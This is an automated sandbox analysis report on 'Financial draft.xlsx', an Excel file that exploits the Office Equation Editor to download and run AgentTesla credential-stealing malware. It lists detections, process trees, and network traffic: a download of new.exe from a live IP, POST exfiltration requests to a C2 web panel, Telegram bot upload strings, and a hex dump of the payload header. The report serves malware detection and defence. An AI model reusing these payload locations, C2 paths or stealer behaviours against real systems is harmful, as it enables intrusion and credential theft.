Loading ...

Play interactive tourEdit tour

Analysis Report Financial draft.xlsx

Overview

General Information

Sample Name:Financial draft.xlsx
Analysis ID:321109
MD5:ab27f33e05cefb65852553e146ab64d3
SHA1:84be9c788eb8738937a1cfaae79bf72e0574c20b
SHA256:66daf72a5b7e2e88cdcecc5c19010fd7ad61d24f70792b5d8d7b719a08a6de68
Tags:AgentTeslaVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
.NET source code contains very large array initializations
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the hosts file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1916 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2528 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2912 cmdline: 'C:\Users\Public\vbc.exe' MD5: 120A53A6B152CF6CED8ED708B2F2A033)
      • RegAsm.exe (PID: 2880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2390402353.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.2190934817.00000000006CE000.00000004.00000020.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2391676087.00000000029CC000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.2190995416.00000000008E2000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.2194644538.0000000003F00000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.vbc.exe.8e0000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.RegAsm.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2528, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2912
                Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.210.214.146, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2528, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                Sigma detected: File Dropped By EQNEDT32EXEShow sources
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2528, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe
                Sigma detected: Executables Started in Suspicious FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2528, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2912
                Sigma detected: Execution in Non-Executable FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2528, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2912
                Sigma detected: Suspicious Program Location Process StartsShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2528, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2912

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://192.210.214.146/new.exeAvira URL Cloud: Label: malware
                Antivirus detection for dropped fileShow sources
                Source: C:\Users\Public\vbc.exeAvira: detection malicious, Label: TR/Kryptik.mnddi
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeAvira: detection malicious, Label: TR/Kryptik.mnddi
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeMetadefender: Detection: 29%Perma Link
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeReversingLabs: Detection: 62%
                Source: C:\Users\Public\vbc.exeMetadefender: Detection: 29%Perma Link
                Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 62%
                Multi AV Scanner detection for submitted fileShow sources
                Source: Financial draft.xlsxReversingLabs: Detection: 20%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJoe Sandbox ML: detected

                Exploits:

                barindex
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.210.214.146:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.210.214.146:80
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 18:17:06 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34Last-Modified: Thu, 19 Nov 2020 03:02:21 GMTETag: "90400-5b46cf4ddb48f"Accept-Ranges: bytesContent-Length: 590848Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2e e0 b5 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 f6 08 00 00 0c 00 00 00 00 00 00 3e 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 34 42 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 14 09 00 57 00 00 00 00 20 09 00 4e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 f5 08 00 00 20 00 00 00 f6 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 4e 08 00 00 00 20 09 00 00 0a 00 00 00 f8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 09 00 00 02 00 00 00 02 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 09 00 00 00 00 00 48 00 00 00 02 00 05 00 10 af 08 00 d4 65 00 00 03 00 00 00 10 00 00 06 10 3c 00 00 00 73 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 27 00 00 70 80 04 00 00 04 2a 1e 02 7b 25 00 00 0a 2a 1e 02 7b 26 00 00 0a 2a 1e 02 7b 27 00 00 0a 2a 72 02 28 07 00 00 0a 02 03 7d 25 00 00 0a 02 04 7d 26 00 00 0a 02 05 7d 27 00 00 0a 2a 1e 02 7b 35 00 00 0a 2a 1e 02 7b 36 00 00 0a 2a 56 02 28 07 00 00 0a 02 03 7d 35 00 00 0a 02 04 7d 36 00 00 0a 2a d2 20 fc 8d 04 4e 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 35 00 00 0a 6f 2f 00 00 0
                Source: Joe Sandbox ViewIP Address: 192.210.214.146 192.210.214.146
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: global trafficHTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.214.146Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /webpanel-majorboy1/inc/8d7b442291cce3.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 192.210.214.146Content-Length: 364Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /webpanel-majorboy1/inc/8d7b442291cce3.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 192.210.214.146Content-Length: 364Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /webpanel-majorboy1/inc/8d7b442291cce3.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 192.210.214.146Content-Length: 586Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /webpanel-majorboy1/inc/8d7b442291cce3.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 192.210.214.146Content-Length: 8866Expect: 100-continue
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJump to behavior
                Source: global trafficHTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.214.146Connection: Keep-Alive
                Source: unknownHTTP traffic detected: POST /webpanel-majorboy1/inc/8d7b442291cce3.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 192.210.214.146Content-Length: 364Expect: 100-continueConnection: Keep-Alive
                Source: RegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: RegAsm.exe, 00000005.00000002.2391633651.00000000029A0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.2391676087.00000000029CC000.00000004.00000001.sdmpString found in binary or memory: http://192.210.214.146
                Source: RegAsm.exe, 00000005.00000002.2391633651.00000000029A0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.2390548311.00000000004F2000.00000004.00000020.sdmpString found in binary or memory: http://192.210.214.146/webpanel-majorboy1/inc/8d7b442291cce3.php
                Source: RegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpString found in binary or memory: http://192.210.214.146/webpanel-majorboy1/inc/8d7b442291cce3.php127.0.0.1POST
                Source: RegAsm.exe, 00000005.00000002.2391633651.00000000029A0000.00000004.00000001.sdmpString found in binary or memory: http://192.210.214.146P
                Source: RegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: RegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpString found in binary or memory: http://cNhFXD.com
                Source: vbc.exe, 00000004.00000003.2185595701.0000000004C54000.00000004.00000001.sdmpString found in binary or memory: http://ns.a
                Source: RegAsm.exe, 00000005.00000002.2391709320.0000000002A02000.00000004.00000001.sdmpString found in binary or memory: http://o0VOknSTi6os4KGPlT.net
                Source: RegAsm.exe, 00000005.00000002.2391007189.0000000002410000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: RegAsm.exe, 00000005.00000002.2391633651.00000000029A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegAsm.exe, 00000005.00000002.2391007189.0000000002410000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: RegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                Source: vbc.exe, 00000004.00000002.2190934817.00000000006CE000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2390402353.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
                Source: RegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                Source: vbc.exeString found in binary or memory: https://login.microsoftonline.com
                Source: vbc.exeString found in binary or memory: https://management.azure.com/
                Source: vbc.exe.2.drString found in binary or memory: https://management.azure.com/Chttps://login.microsoftonline.com
                Source: vbc.exe.2.drString found in binary or memory: https://management.azure.com/subscriptions/
                Source: vbc.exe, 00000004.00000002.2190934817.00000000006CE000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2390402353.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: RegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                Spam, unwanted Advertisements and Ransom Demands:

                barindex
                Modifies the hosts fileShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                System Summary:

                barindex
                .NET source code contains very large array initializationsShow sources
                Source: 4.2.vbc.exe.8e0000.1.unpack, u003cPrivateImplementationDetailsu003eu007b3A044320u002d7A2Fu002d423Au002d89D8u002d48B5BF4C7FDEu007d/u0039EBF40BCu002d89DCu002d44F2u002dB6DAu002d58BE477DA604.csLarge array initialization: .cctor: array initializer size 12102
                Source: 5.2.RegAsm.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b3A044320u002d7A2Fu002d423Au002d89D8u002d48B5BF4C7FDEu007d/u0039EBF40BCu002d89DCu002d44F2u002dB6DAu002d58BE477DA604.csLarge array initialization: .cctor: array initializer size 12102
                Office equation editor drops PE fileShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeCode function: 4_2_00631C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,
                Source: C:\Users\Public\vbc.exeCode function: 4_2_006300AD NtOpenSection,NtMapViewOfSection,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_003953B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0039CB00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0039EF90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00395FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_003956F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_005FAC40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_005F0138
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_005F3620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_005FDB58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_005F5B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_005FED42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_005F3D7B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_005FEDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00704268
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_007002A0
                Source: Financial draft.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: new[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: new[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: 4.2.vbc.exe.8e0000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 4.2.vbc.exe.8e0000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 5.2.RegAsm.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 5.2.RegAsm.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winXLSX@6/6@0/1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Financial draft.xlsxJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR206B.tmpJump to behavior
                Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Financial draft.xlsxReversingLabs: Detection: 20%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: Financial draft.xlsxStatic file information: File size 2355200 > 1048576
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Financial draft.xlsxInitial sample: OLE indicators vbamacros = False
                Source: Financial draft.xlsxInitial sample: OLE indicators encrypted = True
                Source: C:\Users\Public\vbc.exeCode function: 4_2_00033C60 push cs; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00391C40 push ebx; iretd
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_005F3620 push esp; iretd
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_005F3D78 pushfd ; iretd
                Source: initial sampleStatic PE information: section name: .text entropy: 7.86947831412
                Source: initial sampleStatic PE information: section name: .text entropy: 7.86947831412
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
